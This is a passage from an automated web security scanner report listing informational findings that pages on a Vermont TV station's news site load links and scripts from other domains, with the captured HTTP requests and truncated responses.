<link rel="stylesheet" type="text/css" href="http://content.worldnow.com/global/interface/integration/jquery.fancybox-1.3.1.css" media="screen">
<!--MENU INCLUDES-->
<link rel="stylesheet" href="http://content.worldnow.com/global/interface/menu/menu.css?ver=201011111600" type="text/css"><style type="text/css">
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
<label for="WNSearchBox-headertop-google_cs">WEB SEARCH BY <img src='http://WCAX.images.worldnow.com/global/images/google/google-logo.gif' alt='Google' class='wnSearchBoxLabelImg-google'></label>
...[SNIP]...
<div id="WNBranding"><img id="WNBrandingImage" usemap="#wnBrandingMap" alt="" border="0" src="http://WCAX.images.worldnow.com/images/static/hdr/hdr_branding.jpg"><map name="wnBrandingMap">
...[SNIP]...
<a href="/Global/category.asp?C=18195"><img src="http://WCAX.images.worldnow.com/images/272499_G.gif" width="37" height="29" border="0" alt="Home WCAX.com" title="Home WCAX.com" onsrc="http://WCAX.images.worldnow.com/images/272500_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18197"><img src="http://WCAX.images.worldnow.com/images/272501_G.gif" width="34" height="29" border="0" alt="Local News" title="Local News" onsrc="http://WCAX.images.worldnow.com/images/272502_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18196"><img src="http://WCAX.images.worldnow.com/images/272503_G.gif" width="54" height="29" border="0" alt="Weather" title="Weather" onsrc="http://WCAX.images.worldnow.com/images/272504_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18198"><img src="http://WCAX.images.worldnow.com/images/272505_G.gif" width="43" height="29" border="0" alt="Sports" title="Sports" onsrc="http://WCAX.images.worldnow.com/images/272506_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=408799"><img src="http://WCAX.images.worldnow.com/images/272508_G.gif" width="74" height="29" border="0" alt="WCAX Vermontopia Community Calendar" title="WCAX Vermontopia Community Calendar" onsrc="http://WCAX.images.worldnow.com/images/272509_G.gif"></a>
...[SNIP]...
<a href="javascript:OpenWin('http://www.vermontopia.com||height=768,width=1024,location=yes,resizable=yes,scrollbars=yes,toolbar=yes');"><img src="http://WCAX.images.worldnow.com/images/272510_G.gif" width="82" height="29" border="0" alt="Vermontopia.com" title="Vermontopia.com" onsrc="http://WCAX.images.worldnow.com/images/272511_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=398823"><img src="http://WCAX.images.worldnow.com/images/272512_G.gif" width="74" height="29" border="0" alt="WCAX Promotions" title="WCAX Promotions" onsrc="http://WCAX.images.worldnow.com/images/272513_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=68446"><img src="http://WCAX.images.worldnow.com/images/272514_G.gif" width="54" height="29" border="0" alt="LIFESTYLE" title="LIFESTYLE" onsrc="http://WCAX.images.worldnow.com/images/272516_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18836"><img src="http://WCAX.images.worldnow.com/images/272517_G.gif" width="60" height="29" border="0" alt="Contact Us" title="Contact Us" onsrc="http://WCAX.images.worldnow.com/images/272518_G.gif"></a>
...[SNIP]...
<li class="wnAddThisTool wnAddThisTool-All"><a href="http://addthis.com/bookmark.php?v=250&amp;username=xa-4bbcc485014c0ab2" class="addthis_button_compact">Share</a>
...[SNIP]...
<!--END WNStoryUtils-->
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4bbcc485014c0ab2"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://content.worldnow.com/global/interface/drag_drop.js?ver=201011111600"></script>
...[SNIP]...
</a><img class="wnCommentsBranding" alt="Branding" src="http://WCAX.images.worldnow.com/images/static/hdr/hdr_607x37.gif"><div id="wnCommentsAd">
...[SNIP]...
</div><script type="text/javascript" src="http://js-kit.com/comments.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="WNCopyright"><a href="http://www.worldnow.com" target="_blank"><img src="http://WCAX.images.worldnow.com/images/static/container-e/wn_powerby.gif" alt="Powered by WorldNow" border="0"></a>
...[SNIP]...
<noscript><img src="http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.0&amp;WT.sp=WCAX&amp;dcssip=www.wcax.com" name="DCSIMG" width="1" height="1" border="0" alt=""></noscript>
...[SNIP]...
<!--Page Include: BODY--><script type="text/javascript" src="http://tags.crwdcntrl.net/c/492/cc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/global_zoom.js?ver=201011111600"></script>
...[SNIP]...
10.202. http://www.wcax.com/Global/story.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/story.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Global/story.asp?S=503137 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352522776:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
wn: IIS08
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
ntCoent-Length: 49209
Cache-Control: private, max-age=282
Expires: Sat, 09 Apr 2011 12:40:23 GMT
Date: Sat, 09 Apr 2011 12:35:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49209

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>You Can Qu
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
<link type="text/css" rel="stylesheet" media="all" href="http://content.worldnow.com/global/interface/container-e/core.css?ver=201011111600">
<link type="text/css" rel="stylesheet" media="all" href="http://WCAX.images.worldnow.com/interface/css/container-e.css?ver=2011-03-26%2003%3A55%3A56">
<!--[if lt IE 6]>
...[SNIP]...
<![endif]-->
<link rel="stylesheet" type="text/css" href="http://content.worldnow.com/global/interface/integration/jquery.fancybox-1.3.1.css" media="screen">
<!--MENU INCLUDES-->
<link rel="stylesheet" href="http://content.worldnow.com/global/interface/menu/menu.css?ver=201011111600" type="text/css"><style type="text/css">
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
<label for="WNSearchBox-headertop-google_cs">WEB SEARCH BY <img src='http://WCAX.images.worldnow.com/global/images/google/google-logo.gif' alt='Google' class='wnSearchBoxLabelImg-google'></label>
...[SNIP]...
<div id="WNBranding"><img id="WNBrandingImage" usemap="#wnBrandingMap" alt="" border="0" src="http://WCAX.images.worldnow.com/images/static/hdr/hdr_branding.jpg"><map name="wnBrandingMap">
...[SNIP]...
<a href="/Global/category.asp?C=18195"><img src="http://WCAX.images.worldnow.com/images/272499_G.gif" width="37" height="29" border="0" alt="Home WCAX.com" title="Home WCAX.com" onsrc="http://WCAX.images.worldnow.com/images/272500_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18197"><img src="http://WCAX.images.worldnow.com/images/272501_G.gif" width="34" height="29" border="0" alt="Local News" title="Local News" onsrc="http://WCAX.images.worldnow.com/images/272502_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18196"><img src="http://WCAX.images.worldnow.com/images/272503_G.gif" width="54" height="29" border="0" alt="Weather" title="Weather" onsrc="http://WCAX.images.worldnow.com/images/272504_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18198"><img src="http://WCAX.images.worldnow.com/images/272505_G.gif" width="43" height="29" border="0" alt="Sports" title="Sports" onsrc="http://WCAX.images.worldnow.com/images/272506_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=408799"><img src="http://WCAX.images.worldnow.com/images/272508_G.gif" width="74" height="29" border="0" alt="WCAX Vermontopia Community Calendar" title="WCAX Vermontopia Community Calendar" onsrc="http://WCAX.images.worldnow.com/images/272509_G.gif"></a>
...[SNIP]...
<a href="javascript:OpenWin('http://www.vermontopia.com||height=768,width=1024,location=yes,resizable=yes,scrollbars=yes,toolbar=yes');"><img src="http://WCAX.images.worldnow.com/images/272510_G.gif" width="82" height="29" border="0" alt="Vermontopia.com" title="Vermontopia.com" onsrc="http://WCAX.images.worldnow.com/images/272511_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=398823"><img src="http://WCAX.images.worldnow.com/images/272512_G.gif" width="74" height="29" border="0" alt="WCAX Promotions" title="WCAX Promotions" onsrc="http://WCAX.images.worldnow.com/images/272513_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=68446"><img src="http://WCAX.images.worldnow.com/images/272514_G.gif" width="54" height="29" border="0" alt="LIFESTYLE" title="LIFESTYLE" onsrc="http://WCAX.images.worldnow.com/images/272516_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18836"><img src="http://WCAX.images.worldnow.com/images/272517_G.gif" width="60" height="29" border="0" alt="Contact Us" title="Contact Us" onsrc="http://WCAX.images.worldnow.com/images/272518_G.gif"></a>
...[SNIP]...
<span style="white-space:nowrap;"><script src="http://ads.adbrite.com/mb/text_group.php?sid=640921&zs=3436385f3630" type="text/javascript"></script><!--
--><a target="_top" href="http://www.adbrite.com/mb/commerce/purchase_form.php?opid=640921&afsid=1"><img src="http://files.adbrite.com/mb/images/adbrite-your-ad-here-banner.gif" style="background-color:#CCCCCC;border:none;padding:0;margin:0;" alt="Your Ad Here" width="11" height="60" border="0" /></a>
...[SNIP]...
<li class="wnAddThisTool wnAddThisTool-All"><a href="http://addthis.com/bookmark.php?v=250&amp;username=xa-4bbcc485014c0ab2" class="addthis_button_compact">Share</a>
...[SNIP]...
<!--END WNStoryUtils-->
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4bbcc485014c0ab2"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="WNCopyright"><a href="http://www.worldnow.com" target="_blank"><img src="http://WCAX.images.worldnow.com/images/static/container-e/wn_powerby.gif" alt="Powered by WorldNow" border="0"></a>
...[SNIP]...
<noscript><img src="http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.0&amp;WT.sp=WCAX&amp;dcssip=www.wcax.com" name="DCSIMG" width="1" height="1" border="0" alt=""></noscript>
...[SNIP]...
<!--Page Include: BODY--><script type="text/javascript" src="http://tags.crwdcntrl.net/c/492/cc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/global_zoom.js?ver=201011111600"></script>
...[SNIP]...
10.203. http://www.wcax.com/Global/story.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/story.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Global/story.asp?S=452989 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=189321
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302353981562:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS54
P3P: CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 39845
Cache-Control: private, max-age=298
Expires: Sat, 09 Apr 2011 13:20:59 GMT
Date: Sat, 09 Apr 2011 13:16:01 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 39845

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Channel 3
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
<link type="text/css" rel="stylesheet" media="all" href="http://content.worldnow.com/global/interface/container-e/core.css?ver=201011111600">
<link type="text/css" rel="stylesheet" media="all" href="http://WCAX.images.worldnow.com/interface/css/container-e.css?ver=2011-03-26%2003%3A55%3A56">
<!--[if lt IE 6]>
...[SNIP]...
<![endif]-->
<link rel="stylesheet" type="text/css" href="http://content.worldnow.com/global/interface/integration/jquery.fancybox-1.3.1.css" media="screen">
<!--MENU INCLUDES-->
<link rel="stylesheet" href="http://content.worldnow.com/global/interface/menu/menu.css?ver=201011111600" type="text/css"><style type="text/css">
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
<label for="WNSearchBox-headertop-google_cs">WEB SEARCH BY <img src='http://WCAX.images.worldnow.com/global/images/google/google-logo.gif' alt='Google' class='wnSearchBoxLabelImg-google'></label>
...[SNIP]...
<div id="WNBranding"><img id="WNBrandingImage" usemap="#wnBrandingMap" alt="" border="0" src="http://WCAX.images.worldnow.com/images/static/hdr/hdr_branding.jpg"><map name="wnBrandingMap">
...[SNIP]...
<a href="/Global/category.asp?C=18195"><img src="http://WCAX.images.worldnow.com/images/272499_G.gif" width="37" height="29" border="0" alt="Home WCAX.com" title="Home WCAX.com" onsrc="http://WCAX.images.worldnow.com/images/272500_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18197"><img src="http://WCAX.images.worldnow.com/images/272501_G.gif" width="34" height="29" border="0" alt="Local News" title="Local News" onsrc="http://WCAX.images.worldnow.com/images/272502_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18196"><img src="http://WCAX.images.worldnow.com/images/272503_G.gif" width="54" height="29" border="0" alt="Weather" title="Weather" onsrc="http://WCAX.images.worldnow.com/images/272504_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18198"><img src="http://WCAX.images.worldnow.com/images/272505_G.gif" width="43" height="29" border="0" alt="Sports" title="Sports" onsrc="http://WCAX.images.worldnow.com/images/272506_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=408799"><img src="http://WCAX.images.worldnow.com/images/272508_G.gif" width="74" height="29" border="0" alt="WCAX Vermontopia Community Calendar" title="WCAX Vermontopia Community Calendar" onsrc="http://WCAX.images.worldnow.com/images/272509_G.gif"></a>
...[SNIP]...
<a href="javascript:OpenWin('http://www.vermontopia.com||height=768,width=1024,location=yes,resizable=yes,scrollbars=yes,toolbar=yes');"><img src="http://WCAX.images.worldnow.com/images/272510_G.gif" width="82" height="29" border="0" alt="Vermontopia.com" title="Vermontopia.com" onsrc="http://WCAX.images.worldnow.com/images/272511_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=398823"><img src="http://WCAX.images.worldnow.com/images/272512_G.gif" width="74" height="29" border="0" alt="WCAX Promotions" title="WCAX Promotions" onsrc="http://WCAX.images.worldnow.com/images/272513_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=68446"><img src="http://WCAX.images.worldnow.com/images/272514_G.gif" width="54" height="29" border="0" alt="LIFESTYLE" title="LIFESTYLE" onsrc="http://WCAX.images.worldnow.com/images/272516_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18836"><img src="http://WCAX.images.worldnow.com/images/272517_G.gif" width="60" height="29" border="0" alt="Contact Us" title="Contact Us" onsrc="http://WCAX.images.worldnow.com/images/272518_G.gif"></a>
...[SNIP]...
<li class="wnAddThisTool wnAddThisTool-All"><a href="http://addthis.com/bookmark.php?v=250&amp;username=xa-4bbcc485014c0ab2" class="addthis_button_compact">Share</a>
...[SNIP]...
<!--END WNStoryUtils-->
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4bbcc485014c0ab2"></script>
...[SNIP]...
<a href="/Global/link.asp?L=186750"><img src="http://WCAX.images.worldnow.com/images/186750_LS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=451085"><img src="http://WCAX.images.worldnow.com/images/451085_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="WNCopyright"><a href="http://www.worldnow.com" target="_blank"><img src="http://WCAX.images.worldnow.com/images/static/container-e/wn_powerby.gif" alt="Powered by WorldNow" border="0"></a>
...[SNIP]...
<noscript><img src="http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.0&amp;WT.sp=WCAX&amp;dcssip=www.wcax.com" name="DCSIMG" width="1" height="1" border="0" alt=""></noscript>
...[SNIP]...
<!--Page Include: BODY--><script type="text/javascript" src="http://tags.crwdcntrl.net/c/492/cc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/global_zoom.js?ver=201011111600"></script>
...[SNIP]...
10.204. http://www.wcax.com/Global/story.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/story.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Global/story.asp?S=465801 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352790930:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS12
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: MEMORY
Content-Type: text/html; charset=utf-8
ntCoent-Length: 33803
Cache-Control: private, max-age=300
Expires: Sat, 09 Apr 2011 12:44:59 GMT
Date: Sat, 09 Apr 2011 12:39:59 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 33803

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Got a Stor
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
<link type="text/css" rel="stylesheet" media="all" href="http://content.worldnow.com/global/interface/container-e/core.css?ver=201011111600">
<link type="text/css" rel="stylesheet" media="all" href="http://WCAX.images.worldnow.com/interface/css/container-e.css?ver=2011-03-26%2003%3A55%3A56">
<!--[if lt IE 6]>
...[SNIP]...
<![endif]-->
<link rel="stylesheet" type="text/css" href="http://content.worldnow.com/global/interface/integration/jquery.fancybox-1.3.1.css" media="screen">
<!--MENU INCLUDES-->
<link rel="stylesheet" href="http://content.worldnow.com/global/interface/menu/menu.css?ver=201011111600" type="text/css"><style type="text/css">
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
<label for="WNSearchBox-headertop-google_cs">WEB SEARCH BY <img src='http://WCAX.images.worldnow.com/global/images/google/google-logo.gif' alt='Google' class='wnSearchBoxLabelImg-google'></label>
...[SNIP]...
<div id="WNBranding"><img id="WNBrandingImage" usemap="#wnBrandingMap" alt="" border="0" src="http://WCAX.images.worldnow.com/images/static/hdr/hdr_branding.jpg"><map name="wnBrandingMap">
...[SNIP]...
<a href="/Global/category.asp?C=18195"><img src="http://WCAX.images.worldnow.com/images/272499_G.gif" width="37" height="29" border="0" alt="Home WCAX.com" title="Home WCAX.com" onsrc="http://WCAX.images.worldnow.com/images/272500_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18197"><img src="http://WCAX.images.worldnow.com/images/272501_G.gif" width="34" height="29" border="0" alt="Local News" title="Local News" onsrc="http://WCAX.images.worldnow.com/images/272502_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18196"><img src="http://WCAX.images.worldnow.com/images/272503_G.gif" width="54" height="29" border="0" alt="Weather" title="Weather" onsrc="http://WCAX.images.worldnow.com/images/272504_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18198"><img src="http://WCAX.images.worldnow.com/images/272505_G.gif" width="43" height="29" border="0" alt="Sports" title="Sports" onsrc="http://WCAX.images.worldnow.com/images/272506_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=408799"><img src="http://WCAX.images.worldnow.com/images/272508_G.gif" width="74" height="29" border="0" alt="WCAX Vermontopia Community Calendar" title="WCAX Vermontopia Community Calendar" onsrc="http://WCAX.images.worldnow.com/images/272509_G.gif"></a>
...[SNIP]...
<a href="javascript:OpenWin('http://www.vermontopia.com||height=768,width=1024,location=yes,resizable=yes,scrollbars=yes,toolbar=yes');"><img src="http://WCAX.images.worldnow.com/images/272510_G.gif" width="82" height="29" border="0" alt="Vermontopia.com" title="Vermontopia.com" onsrc="http://WCAX.images.worldnow.com/images/272511_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=398823"><img src="http://WCAX.images.worldnow.com/images/272512_G.gif" width="74" height="29" border="0" alt="WCAX Promotions" title="WCAX Promotions" onsrc="http://WCAX.images.worldnow.com/images/272513_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=68446"><img src="http://WCAX.images.worldnow.com/images/272514_G.gif" width="54" height="29" border="0" alt="LIFESTYLE" title="LIFESTYLE" onsrc="http://WCAX.images.worldnow.com/images/272516_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18836"><img src="http://WCAX.images.worldnow.com/images/272517_G.gif" width="60" height="29" border="0" alt="Contact Us" title="Contact Us" onsrc="http://WCAX.images.worldnow.com/images/272518_G.gif"></a>
...[SNIP]...
<li class="wnAddThisTool wnAddThisTool-All"><a href="http://addthis.com/bookmark.php?v=250&amp;username=xa-4bbcc485014c0ab2" class="addthis_button_compact">Share</a>
...[SNIP]...
<!--END WNStoryUtils-->
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4bbcc485014c0ab2"></script>
...[SNIP]...
<div class="wnStoryBodyGraphic wnImageWidth-180"><img src="http://WCAX.images.worldnow.com/images/465801_BG4.jpg" alt="WCAX Assignment Editor Scott Waterman" title="WCAX Assignment Editor Scott Waterman" border="0" width="180">
<span>
...[SNIP]...
<p>You can also send your ideas to the <a href="http://twitter.com/wcaxnewsdesk" target="_blank">WCAX Newsdesk via Twitter!</a>
...[SNIP]...
<a href="/Global/category.asp?C=18830"><img src="http://WCAX.images.worldnow.com/images/37412_G.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="WNCopyright"><a href="http://www.worldnow.com" target="_blank"><img src="http://WCAX.images.worldnow.com/images/static/container-e/wn_powerby.gif" alt="Powered by WorldNow" border="0"></a>
...[SNIP]...
<noscript><img src="http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.0&amp;WT.sp=WCAX&amp;dcssip=www.wcax.com" name="DCSIMG" width="1" height="1" border="0" alt=""></noscript>
...[SNIP]...
<!--Page Include: BODY--><script type="text/javascript" src="http://tags.crwdcntrl.net/c/492/cc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/global_zoom.js?ver=201011111600"></script>
...[SNIP]...
10.205. http://www.wcax.com/build.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /build.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /build.asp?buildtype=buildpagexmlrequest&featureType=S&featureid=503137&affiliateno=183&clientgroupid=1&rnd=152692 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/global/video/flash/widgets/WNGallery.swf?ver=201010090400
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352546556:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: iis51
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/xml; charset=utf-8
ntCoent-Length: 258153
Cache-Control: private, max-age=300
Date: Sat, 09 Apr 2011 12:35:53 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 258153

